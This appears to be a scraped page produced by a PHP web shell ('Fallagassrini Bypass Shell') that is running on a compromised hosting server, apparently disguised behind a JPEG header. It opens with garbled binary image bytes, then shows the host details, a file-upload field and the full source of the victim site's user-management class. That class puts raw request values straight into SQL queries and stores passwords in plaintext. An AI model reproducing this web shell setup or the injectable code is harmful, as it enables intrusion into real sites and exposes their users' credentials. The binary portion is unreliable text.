JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/includes/classes/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/includes/classes/class.User.php

<?php
#####Class For Adding Content Management ######
class User extends MysqlFns{
/* class constructor */
function User(){
$this->LDDisplayPath= $config['SiteGlobalPath']."class.User.php";
global $config;
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
$this->MysqlFns();
$this->Limit = 20;			
} 
/*************************************************View User List/***************************************************************/
function ListUser($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
$i=$_SESSION['Web_USER_GROUP'];
/*******************      User List              **************/
if($_POST['table_search'] <> '')
{

$SelQuery='SELECT  * FROM `user_master` WHERE emp_status="1" AND (empname like "%'.$_POST['table_search'].'%" OR usergroup like "%'.$_POST['table_search'].'%" OR isactive like "%'.$_POST['table_search'].'%" OR mobileno like "%'.$_POST['table_search'].'%" OR phone like "%'.$_POST['table_search'].'%" OR emailid like "%'.$_POST['table_search'].'%" OR password like "%'.$_POST['table_search'].'%") ORDER BY empdesignation ASC';

}
else
{
//echo $_SESSION['Web_USER_GROUP']; exit;
if($_SESSION['Web_USER_GROUP'] != 'Super Admin')
{
 $SelQuery = 'SELECT  * FROM `user_master` WHERE emp_status="1" AND userGroup != "Super Admin" ORDER BY empdesignation ASC';
}else{

 $SelQuery = 'SELECT  * FROM `user_master` WHERE emp_status="1" ORDER BY empname ASC';

}
}
//echo $SelQuery;
/*$listing_split = new MsplitPageResults($SelQuery, $this->Limit);
if ( ($listing_split->number_of_rows > 0) )  
{
$objSmarty->assign('Contact_List_LinkPage',$listing_split->display_count(TEXT_DISPLAY_NUMBER_OF_RESULT));
$objSmarty->assign('Contact_List_PerPageNavigation',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
$ListView = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
}
if(!empty($ListView) && is_array($ListView))
foreach($ListView as $key=>$value)
{
$ListView[$key]['Cid'] = stripslashes($ListView[$key]['customer_id']);
}		
$objSmarty->assign('i', $listing_split->i);*/
$ListView = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListView', $ListView);//print_r($ListView);exit;
return $ListView;
}		
/*************************************************List User Group/***************************************************************/
function ListUserGroup($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
 $SelQuery = 'SELECT  * FROM `user_group_master` WHERE usergroupName !="Super Admin" AND status="1"';
$ListGroup = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListGroup', $ListGroup);
return $ListGroup;
}	

/*************************************************List Employee Designation/***************************************************************/
function ListEmpDesignation($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
 $SelQuery = 'SELECT  * FROM `designation_master` WHERE designation_name !="Super Admin" AND isactive="1"';
$ListDesig = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListDesig', $ListDesig);
return $ListDesig;
}	


/*************************************************Get User Count/***************************************************************/
function GetUserCount($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
if($_GET['companyId'] <> '')
{
	$compid = base64_decode($_GET['companyId']);
}	
else
{
	$compid = $_SESSION['Web_CustomerId'];
}
  $SelQuery = 'SELECT  COUNT(`user_master`.slNo) as userCount FROM `user_master` WHERE `user_master`.emp_status="1"'; 
$ListuserCount = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListuserCount', $ListuserCount);
return $ListuserCount;
}	

/************************************************* End Get User Count/***************************************************************/

  /*************************************************View User Detail***************************************************************/
function UserEditView($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
if($_GET['userId'] <> '')
{
    $sid = base64_decode($_GET['userId']);
}
else
{
    $sid = $_SESSION['Web_User_ID'];
}
   $SelQuery = 'SELECT * FROM `user_master` WHERE slNo="'.$sid.'" AND emp_status="1"';   
$ListEditView = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListEditView', $ListEditView);
return $ListEditView;
}
/*************************************************View User Detail Change Password***************************************************************/
function UserEditViewChange($objArray)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
$SelQuery = 'SELECT * FROM `user_master` WHERE slNo="'.$_SESSION['Web_User_ID'].'" AND emp_status="1"';
$ListEditChange = $this->ExecuteQuery($SelQuery, "select");
$objSmarty->assign('ListEditChange', $ListEditChange);
return $ListEditChange;
}
/*************************************************Reset Password***************************************************************/
 function ChangeUserPassword($objArray)
 { 	//echo"am here";exit;

 global $objSmarty,$config;
$tbl = $config['DBPrefix'];
            if((!$objArray['new_password'])){
			$objSmarty->assign('ErrorMessage', 'Password should not be blank');
			return false;
			}elseif(!$objArray['retype_new_password']){
			$objSmarty->assign('ErrorMessage', 'Confirm Password should not be blank');
			return false;
			}
			//$objSmarty->assign('user_name', $objArray['user_name']);
			if($objArray['new_password'] && $objArray['retype_new_password']){
			
	
		
		
   $UpQuery = 'UPDATE `user_master` SET `password` = "'.trim($objArray['new_password']).'",`re_password` = "'.trim($objArray['retype_new_password']).'" WHERE `slNo` ="'.$_SESSION['Web_User_ID'].'" AND `userName` ="'.$_SESSION['Web_UserName'].'"'; 
	$this->ExecuteQuery($UpQuery, 'update');

}
   header('Location:' .$_SERVER['PHP_SELF'].'?success&user_id='.$objArray['user_id'].'&window_action=true');
  
  }
  
  /*************************************************Insert User Image/***************************************************************/
function ChangeUserImage($objArray,$objFiles)
{
global $objSmarty,$config,$_POST,$objFiles;
$tbl = $config['DBPrefix'];

if(!$objArray['userLogo']){
$objSmarty->assign('ErrorMessage', 'User Image should not be blank');
return false;
}/*elseif(!$objArray['isActive']){
$objSmarty->assign('ErrorMessage', 'Is Active should not be blank');
return false;
}*/
	list ($name,$format) = split("[.]", $_FILES['userLogo']['name'],2);
	
		 $uploadpath = $config['UserImageUpload'];  
		if($_FILES['userLogo']["name"] <> "")
		{	
			
			    $errors     = array();
   				$maxsize    = 5272880;
   				$acceptable = array(
				'image/jpeg','image/jpg','image/gif','image/png');
		if(($_FILES['userLogo']['size'] >= $maxsize) || ($_FILES["userLogo"]["size"] == 0)) {
		$errors2[] = 'File --2-- too large. File must be less than 5 MB';
		}
		
		if((!in_array($_FILES['userLogo']['type'], $acceptable)) && (!empty($_FILES["userLogo"]["type"])))
		 {//echo"format";
		$errors3[] = 'File --2-- Only PDF, JPG, JPEG, GIF and PNG types are accepted';
		}
		
		if(count($errors2)  === 0 && count($errors3)  === 0) 
		{
			if((!file_exists($config['UserImageUpload'] . $_FILES["userLogo"]["name"])))
			{  
				echo $f1 = $_FILES['userLogo']['name']; exit;
				if(move_uploaded_file($_FILES['userLogo']['tmp_name'], $uploadpath.$f1))
				chmod($uploadpath.$f1,"755");
				
			}
			elseif((file_exists($config['UserImageUpload'] . $_FILES["userLogo"]["name"]))) 
		
			{	$f1 = explode(".", $_FILES['userLogo']['name']);
				$newfilename = round(microtime(true)) . '.' . end($f1);
				if(move_uploaded_file($_FILES['userLogo']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,"755");
				$f1=$newfilename;  
			}
		}
				
			else {
        	foreach($errors2 as $error2) 
			{
            $objSmarty->assign('ErrorMessage', $error2);
			return false;			
        	}
			foreach($errors3 as $errors2) 
			{
            $objSmarty->assign('ErrorMessage', $errors2);
			return false;
			
        	}
		
		}
	}
	else
	{
	$f1="";
	}
if($objArray['userLogo']){
 echo 	
   $UpQuery = 'UPDATE `user_master` SET `userImage` = "'.$f1.'" WHERE `slNo` ="'.$_SESSION['Web_User_ID'].'" AND `userName` ="'.$_SESSION['Web_UserName'].'"'; 
	$this->ExecuteQuery($UpQuery, 'update');

}
   header('Location:' .$_SERVER['PHP_SELF'].'?success&user_id='.$objArray['user_id'].'&window_action=true');
  
  }
/*************************************************End User Image /***************************************************************/
/*************************************************Insert User/***************************************************************/
function InsertUser($objArray)
{
global $objSmarty,$config,$objFiles;
$tbl = $config['DBPrefix'];
/*	if($_GET['companyId'] <> '')
	{
		$compid = base64_decode($_GET['companyId']);
	}	
	else
	{
		$compid = $_SESSION['Web_CustomerId'];
	}
*/
if((!$objArray['empName'])){
$objSmarty->assign('ErrorMessage', 'Employee Name should not be blank');
return false;
}elseif(!$objArray['userGroup']){
$objSmarty->assign('ErrorMessage', 'User Group should not be blank');
return false;
}elseif(!$objArray['empCode']){
$objSmarty->assign('ErrorMessage', 'Employee Code should not be blank');
return false;
}elseif(!$objArray['mobileNo']){
$objSmarty->assign('ErrorMessage', 'Mobile No should not be blank');
return false;
}elseif(!$objArray['empDesig']){
$objSmarty->assign('ErrorMessage', 'Employee Designation should not be blank');
return false;
}elseif(!$objArray['emailId']){
$objSmarty->assign('ErrorMessage', 'Email Id should not be blank');
return false;
}elseif(!$objArray['doj']){
$objSmarty->assign('ErrorMessage', 'Date of Joining should not be blank');
return false;
}elseif(!$objArray['password']){
$objSmarty->assign('ErrorMessage', 'Password should not be blank');
return false;
}elseif(!$objArray['re-password']){
$objSmarty->assign('ErrorMessage', 'Retype Password should not be blank');
return false;
}
//list ($name,$format) = split("[.]", $_FILES['image']['name'],2);
$uploadpath = $config['UserImageUpload']; 
		if($_FILES['profileImage']["name"] <> "")
		{	
			//echo $_FILES['profileImage']["name"]; 
			    $errors     = array();
   				$maxsize    = 72880;
   				$acceptable = array(
				'image/jpeg','image/jpg','image/gif','image/png');
		if(($_FILES['profileImage']['size'] >= $maxsize) || ($_FILES["profileImage"]["size"] == 0)) {
		$errors2[] = 'Image is too large. Image must be less than 1 MB';
		}
		
		if((!in_array($_FILES['profileImage']['type'], $acceptable)) && (!empty($_FILES["profileImage"]["type"])))
		 {//echo"format";
		$errors3[] = 'Only JPG, JPEG and PNG types are accepted';
		}
		
		if(count($errors2)  === 0 && count($errors3)  === 0) 
		{
			if((!file_exists($config['UserImageUpload'] . $_FILES["profileImage"]["name"])))
			{  
				$f1 = $_FILES['profileImage']['name'];
				$f1 = explode(".", $_FILES['profileImage']['name']);
				$f1;
				$newfilename = round(microtime(true)) . '.' . end($f1); 
				if(move_uploaded_file($_FILES['profileImage']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,0755);
				echo $f1=$newfilename;   
			}
			elseif((file_exists($config['UserImageUpload'] . $_FILES["profileImage"]["name"]))) 
		
			{	$f1 = explode(".", $_FILES['profileImage']['name']);
				$f1;
				$newfilename = round(microtime(true)) . '.' . end($f1);
				if(move_uploaded_file($_FILES['profileImage']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,0755);
				$f1=$newfilename;
			}
		}
				
			else {
        	foreach($errors2 as $error2) 
			{
            $objSmarty->assign('ErrorMessage', $error2);
			return false;			
        	}
			foreach($errors3 as $errors2) 
			{
            $objSmarty->assign('ErrorMessage', $errors2);
			return false;
			
        	}
		
		}
	}
		else
		{
		$f1="";
		}



$objSmarty->assign('empName', $objArray['empName']);
if($objArray['userGroup'] && $objArray['empName']){
 $InsQuery = 'INSERT INTO `user_master`
(
`empcode`,
`empname`,
`empdesignation`,
`emp_doj`,
`usergroup`,
`userimage`,
`isactive`,
`mobileno`,
`phone`,
`emailid`,
`password`,
`emp_status`
) 
VALUES(
"'.trim(addslashes($objArray['empCode'])).'",
"'.trim(addslashes($objArray['empName'])).'",
"'.trim(addslashes($objArray['empDesig'])).'",
"'.trim(addslashes($objArray['doj'])).'",
"'.trim(addslashes($objArray['userGroup'])).'",
"'.$f1.'",
"'.trim(addslashes($objArray['checkVal'])).'",
"'.trim(addslashes($objArray['mobileNo'])).'",
"'.trim(addslashes($objArray['phone'])).'",
"'.trim(addslashes($objArray['emailId'])).'",
"'.trim(addslashes($objArray['password'])).'",
"1")'; 
 
$this->ExecuteQuery($InsQuery, 'insert');
}
header('Location:userList.php?success_msg_for_insert');
}
/*************************************************Edit User/***************************************************************/
function EditUser($objArray="")
{
global $objSmarty,$config,$objFiles;
$tbl = $config['DBPrefix'];
/* if($_GET['companyId'] <> '')
{
	$compid = base64_decode($_GET['companyId']);
}	
else
{
	$compid = $_SESSION['Web_CustomerId'];
} */
if((!$objArray['empName'])){
$objSmarty->assign('ErrorMessage', 'Employee Name should not be blank');
return false;
}elseif(!$objArray['userGroup']){
$objSmarty->assign('ErrorMessage', 'User Group should not be blank');
return false;
}elseif(!$objArray['empCode']){
$objSmarty->assign('ErrorMessage', 'Employee Code should not be blank');
return false;
}elseif(!$objArray['mobileNo']){
$objSmarty->assign('ErrorMessage', 'Mobile No should not be blank');
return false;
}elseif(!$objArray['empDesig']){
$objSmarty->assign('ErrorMessage', 'Employee Designation should not be blank');
return false;
}elseif(!$objArray['doj']){
$objSmarty->assign('ErrorMessage', 'Date of Joining should not be blank');
return false;
}elseif(!$objArray['emailId']){
$objSmarty->assign('ErrorMessage', 'Email Id should not be blank');
return false;
}elseif(!$objArray['password']){
$objSmarty->assign('ErrorMessage', 'Password should not be blank');
return false;
}elseif(!$objArray['re-password']){
$objSmarty->assign('ErrorMessage', 'Re-Password should not be blank');
return false;
}

$uploadpath = $config['UserImageUpload']; 
		if($_FILES['profileImage']["name"] <> "")
		{	
			//echo $_FILES['profileImage']["name"]; 
			//echo $_FILES['profileImage']["size"]; exit;
			    $errors     = array();
   				$maxsize    = 72880;
   				$acceptable = array(
				'image/jpeg','image/jpg','image/gif','image/png');
		if(($_FILES['profileImage']['size'] >= $maxsize) || ($_FILES["profileImage"]["size"] == 0)) {
		$errors2[] = 'Image is too large. Image must be less than 1 MB';
		}
		
		if((!in_array($_FILES['profileImage']['type'], $acceptable)) && (!empty($_FILES["profileImage"]["type"])))
		 {//echo"format";
		$errors3[] = 'Only JPG, JPEG and PNG types are accepted';
		}
		
		if(count($errors2)  === 0 && count($errors3)  === 0) 
		{
			if((!file_exists($config['UserImageUpload'] . $_FILES["profileImage"]["name"])))
			{  
				$f1 = $_FILES['profileImage']['name'];
				$f1 = explode(".", $_FILES['profileImage']['name']);
				//echo $f1;
				 $newfilename = round(microtime(true)) . '.' . end($f1); 
				if(move_uploaded_file($_FILES['profileImage']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,0755);
				 $f1=$newfilename;   
			}
			elseif((file_exists($config['UserImageUpload'] . $_FILES["profileImage"]["name"]))) 
		
			{	$f1 = explode(".", $_FILES['profileImage']['name']);
			//echo $f1; exit;
				$newfilename = round(microtime(true)) . '.' . end($f1);
				if(move_uploaded_file($_FILES['profileImage']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,0755);
				$f1=$newfilename;  
			}
		}
				
			else {
        	foreach($errors2 as $error2) 
			{
            $objSmarty->assign('ErrorMessage', $error2);
			return false;			
        	}
			foreach($errors3 as $errors2) 
			{
            $objSmarty->assign('ErrorMessage', $errors2);
			return false;
			
        	}
		
		}
	}
	else
	{
	$f1=$objArray['profileImageName'];
	}

	$imgName =$f1;
	//echo $imgName; 
	
	if($imgName =="")
	{
	  $_POST['profileImageName']."if"; 
		$filename= $_POST['profileImageName'] ;
		$pathName= $_POST['imagePath'] ;
	}
	else
	{
	 $imgName."else"; 
		$filename= $f1 ;
		$pathName= $uploadpath.$f1 ;
	}



$objSmarty->assign('userId', $objArray['userId']);
if($objArray['userId'] && $objArray['empName']){
$UpQuery = 'UPDATE `user_master` SET 
`empname` = "'.trim($objArray['empName']).'",
`empcode` = "'.trim($objArray['empCode']).'",
`empdesignation` = "'.trim($objArray['empDesig']).'",
`emp_doj` = "'.trim($objArray['doj']).'",
`emp_dor` = "'.trim($objArray['dor']).'",
`usergroup` = "'.trim($objArray['userGroup']).'",
`userimage`= "'.$filename.'",
`isactive` = "'.trim($objArray['checkVal']).'",
`mobileno` = "'.trim($objArray['mobileNo']).'",
`phone` = "'.trim($objArray['phone']).'",
`emailid` = "'.trim($objArray['emailId']).'",
`password` = "'.trim($objArray['password']).'"
WHERE 
`slno` ="'.trim($objArray['userId']).'"';
$this->ExecuteQuery($UpQuery, 'update');
}
header('Location:userList.php?success_msg_for_update');  
}

/*************************************Delete/********************************************************************/
function DeleteMaster($sid)
{
global $objSmarty,$config;
$tbl = $config['DBPrefix'];
$sid = base64_decode($_GET['userId']);
if($_GET['companyId'] <> '')
{
	$compid = base64_decode($_GET['companyId']);
}	
else
{
	$compid = $_SESSION['Web_CustomerId'];
}
$DelQuery = 'update `user_master` set `status`= 0 WHERE `slNo` ="'.$sid.'"';
$this->ExecuteQuery($DelQuery, 'update');
header('Location:' .$_SERVER['PHP_SELF'].'?succs_msg_for_del');  
}

function emailduplicate($objArray="")
{
	global $objSmarty,$config,$_POST;
  	$tbl = $config['DBPrefix'];
			$SelQuery = 'SELECT * FROM `user_master` WHERE emailid="'.$_GET['checkemail'].'" AND emp_status="1" AND isactive="1"';
			$eid	= $this->ExecuteQuery($SelQuery, 'select');
			if(!empty($eid) && is_array($eid))
			{
				$results= "yes";
			}
			else
			{
				$results = "no";			
			}
        foreach($eid as $keys=>$value)
		{
         echo $eid[$keys]["emailid"]."_".$results;
		}
		
}
}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net